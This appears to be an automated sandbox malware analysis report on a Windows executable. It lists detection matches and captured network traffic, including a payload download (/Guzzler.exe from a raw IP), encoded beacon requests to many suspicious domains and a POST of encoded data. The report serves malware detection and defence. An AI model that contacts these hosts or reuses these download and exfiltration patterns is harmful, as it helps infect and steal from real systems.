Windows Analysis Report
P1 HWT623ATG.bat.exe

AI detected suspicious sample

Source: Yara match	File source: 9.2.P1 HWT623ATG.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.P1 HWT623ATG.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.3719971214.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3723441735.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3709324958.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3719882402.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1575209433.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1575852421.0000000000BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1578650551.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3719927203.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: P1 HWT623ATG.bat.exe

Joe Sandbox ML: detected

Source: P1 HWT623ATG.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: P1 HWT623ATG.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: compact.pdbGCTL source: P1 HWT623ATG.bat.exe, 00000009.00000002.1576160374.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 00000019.00000002.3718182571.0000000000718000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Smilet.exe, 00000028.00000001.3704245850.0000000000649000.00000020.00000001.01000000.00000014.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 00000019.00000002.3709303599.000000000005E000.00000002.00000001.01000000.0000000F.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3709074079.000000000005E000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: wntdll.pdbUGP source: P1 HWT623ATG.bat.exe, 00000009.00000002.1576508573.0000000001200000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000001A.00000003.1578452345.00000000038DE000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000001A.00000002.3721271151.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000001A.00000003.1575491955.0000000003721000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000001A.00000002.3721271151.0000000003C2E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: P1 HWT623ATG.bat.exe, P1 HWT623ATG.bat.exe, 00000009.00000002.1576508573.0000000001200000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000001A.00000003.1578452345.00000000038DE000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000001A.00000002.3721271151.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000001A.00000003.1575491955.0000000003721000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000001A.00000002.3721271151.0000000003C2E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: compact.pdb source: P1 HWT623ATG.bat.exe, 00000009.00000002.1576160374.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 00000019.00000002.3718182571.0000000000718000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Smilet.exe, 00000028.00000001.3704245850.0000000000649000.00000020.00000001.01000000.00000014.sdmp

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 4x nop then jmp 0793AB4Ah		1_2_0793A3CF
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 4x nop then jmp 05A89DFAh		10_2_05A8967F

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.lenovest.xyz

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Jun 2024 16:28:35 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Tue, 04 Jun 2024 18:51:40 GMTETag: "17d520-61a14f0b9e40f"Accept-Ranges: bytesContent-Length: 1561888Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad f1 28 81 e9 90 46 d2 e9 90 46 d2 e9 90 46 d2 2a 9f 19 d2 eb 90 46 d2 e9 90 47 d2 77 90 46 d2 2a 9f 1b d2 e6 90 46 d2 bd b3 76 d2 e3 90 46 d2 2e 96 40 d2 e8 90 46 d2 52 69 63 68 e9 90 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f0 d4 f6 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 7c 02 00 00 04 00 00 6b 32 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 50 0a 00 00 04 00 00 cf fb 17 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 85 00 00 a0 00 00 00 00 f0 03 00 30 51 06 00 00 00 00 00 00 00 00 00 e8 ca 17 00 38 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ff 62 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4a 13 00 00 00 80 00 00 00 14 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 55 02 00 00 a0 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 f0 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 30 51 06 00 00 f0 03 00 00 52 06 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 194.9.94.86 194.9.94.86
Source: Joe Sandbox View	IP Address: 162.0.213.94 162.0.213.94

Source: Joe Sandbox View

ASN Name: ACPCA ACPCA

Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.245.142

Source: global traffic	HTTP traffic detected: GET /l4k7/?9d=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+RkpzmaC/oeJhPADFzgiJMLR5FtBl6eht1vjrsMq9ONCaKj3k5GiGvog+&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1Host: www.futuregainers.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /41br/?G0a=VFN0vBc0ol1ljnb0&9d=65BU6tOk0p5LPOIIq5f29seWsrYdgC5c7tuB1xkwgoR5MWDkLOQgx5fJDEvOf4AlMkoVXixJXV15AbOmLh5rfhm5DYiSLYNIQJZpK4Rmnt3Mzv5831d4ZrhRkHRqInFW2dXaUcZHASEt HTTP/1.1Host: www.shopnow321.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /4mpz/?9d=Y+s3rA3a2LtNoPwWBpgaIhZOwJKcGGwPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4VpizPsaF86hmUooqlU0clf3MZo9yRfCdtfy1jNGRBq2V4+pMGerSvIMLN&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1Host: www.klimkina.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /0a9p/?G0a=VFN0vBc0ol1ljnb0&9d=V8kIBUO99PR2h3hxIilGCb7xaYAlhXctAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SaRICxMFUNkXtPm1N7nAwt3H84qVeuxzzlvsq+rVjUlYjzq9gXVFKEYh8 HTTP/1.1Host: www.shahaf3d.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /3h10/?9d=9mZLXJL8GvO5ODxbtOpJ+rtZ6f1lqm3xC+OCFBImS8kNzrmbjyRfioF27F6qemRmHzSdXM7CT4wlEWpleIDtGTZ1FuoRBIGpq98dFU7vfHeXH9gl+ce92Dv1nZMBIpBNzTq2jDHLjtUw&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1Host: www.againbeautywhiteskin.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /e20q/?9d=WPritX3A9R+ySLDHKkvQUC0K3y08yWvw5+tRT3chZ2wpNsEUE7uyewm5xlmwIO2sKs7uf3/86JENB8xtRbvRK6PKTUJmFuSnUKaTSFytHSrQj6qyTDgK0xjAREMwU5wVtegslCXYDiBq&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1Host: www.lenovest.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /Guzzler.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like GeckoHost: 2.56.245.142Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /2ha1/?G0a=VFN0vBc0ol1ljnb0&9d=r6q+x3A/FEQLw6gmNICl4m79J6xGYnb4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2LEX+h4RptWZDRuVlG4JzOnajShxrpz3BSvEogxiihZ9tHyNye+qQgWsY HTTP/1.1Host: www.931951.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /egr4/?9d=OombhWzhkCuNqFAQBgJWCTIe5Ku7zRL7Rc3Pxm83mLxAAziOmqPFMSLkiV9xX+4t83HRZJys59Cvhm/US+qC1S/tz9V2xJeiTRy2uMqSR06k3ZbbYlILY5knN9gwwCUqzf9nwI+FPnn/&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1Host: www.srripaspocon.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /r45o/?9d=gzu5VRbRlKcxtienrOg/vYWmVRq4TNxrFroidVFNmLFBxOvIucJSpLXaDw+Y+myNYDD7xGaCks3CSH70SMI2pnLhFLXOBLrZylJOsjWCWApEJOKs/ooDCJFxqK6p3RZXycGtf6I8hj/U&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1Host: www.torentreprenad.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /4iea/?9d=LPPTutp79E4NI/FTL4slzgCz9Mw5fMldsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp/x6QXeu+cIhmsENqwLKbzAke2hCAvuJuIziLbcuyQtVHWzDtEtwuFhDD&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1Host: www.grecanici.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /hcaw/?9d=Xa5/huFy8Eck4v8ee+xdjh1i7ba8Clp/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNpV/H8uI+lgidsfe724rSsodQ5uAfCV2elW9ENMTuv5SSVXQJAcj0qHHf&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1Host: www.93v0.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /mjuo/?9d=GUK7oVIRF3FAoVisjIpZqa7HO+54FDT9CfoAB53ViUuzbZ1TAtWa7LnCzENP06w/wd6reHxcMz42RIoq6sWsgYEYCrnoxIy0wOTor1QdDe9x8GrLmxcBWSK4ygqmUmz0vTBYLSkIKLnt&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1Host: www.leadchanges.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko

Source: hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://popupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.com equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.fr2e4o.cfd
Source: global traffic	DNS traffic detected: DNS query: www.futuregainers.net
Source: global traffic	DNS traffic detected: DNS query: www.shopnow321.online
Source: global traffic	DNS traffic detected: DNS query: www.klimkina.pro
Source: global traffic	DNS traffic detected: DNS query: www.shahaf3d.com
Source: global traffic	DNS traffic detected: DNS query: www.againbeautywhiteskin.asia
Source: global traffic	DNS traffic detected: DNS query: www.homeppower.com
Source: global traffic	DNS traffic detected: DNS query: www.lenovest.xyz
Source: global traffic	DNS traffic detected: DNS query: www.931951.com
Source: global traffic	DNS traffic detected: DNS query: www.srripaspocon.org
Source: global traffic	DNS traffic detected: DNS query: www.x5hh186z.skin
Source: global traffic	DNS traffic detected: DNS query: www.torentreprenad.com
Source: global traffic	DNS traffic detected: DNS query: www.grecanici.com
Source: global traffic	DNS traffic detected: DNS query: www.navigate-power.boats
Source: global traffic	DNS traffic detected: DNS query: www.93v0.com
Source: global traffic	DNS traffic detected: DNS query: www.leadchanges.info

Source: unknown

HTTP traffic detected: POST /41br/ HTTP/1.1Host: www.shopnow321.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 215Origin: http://www.shopnow321.onlineReferer: http://www.shopnow321.online/41br/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like GeckoData Raw: 39 64 3d 33 37 70 30 35 5a 32 48 6a 6f 4d 6f 41 65 68 44 73 72 79 72 34 66 47 6b 71 2f 63 72 32 69 6c 56 31 4f 6d 50 36 78 6c 6b 6a 65 67 55 63 48 37 63 54 36 46 4c 77 72 76 52 5a 30 37 79 58 74 63 6c 4b 68 51 74 50 78 59 78 54 42 77 6b 53 61 79 65 49 53 30 7a 51 79 57 43 4a 72 75 36 42 71 78 5a 51 4a 74 4c 58 35 46 50 75 63 50 58 36 76 5a 46 39 54 64 37 58 35 63 64 6e 79 5a 72 53 58 51 34 7a 38 7a 75 66 73 63 47 44 67 38 34 5a 68 43 59 6e 34 35 35 4c 4e 48 65 79 77 6e 4d 76 42 48 31 63 36 4c 75 49 4b 51 77 6a 6c 47 2f 53 50 6d 37 41 5a 30 36 56 30 79 79 2f 45 4f 52 58 44 2f 72 42 6d 74 6b 6e 64 35 44 49 4f 78 70 4e 65 6e 6a 42 67 3d 3d Data Ascii: 9d=37p05Z2HjoMoAehDsryr4fGkq/cr2ilV1OmP6xlkjegUcH7cT6FLwrvRZ07yXtclKhQtPxYxTBwkSayeIS0zQyWCJru6BqxZQJtLX5FPucPX6vZF9Td7X5cdnyZrSXQ4z8zufscGDg84ZhCYn455LNHeywnMvBH1c6LuIKQwjlG/SPm7AZ06V0yy/EORXD/rBmtknd5DIOxpNenjBg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 16:27:17 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Mon, 03 Oct 2022 20:19:07 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@
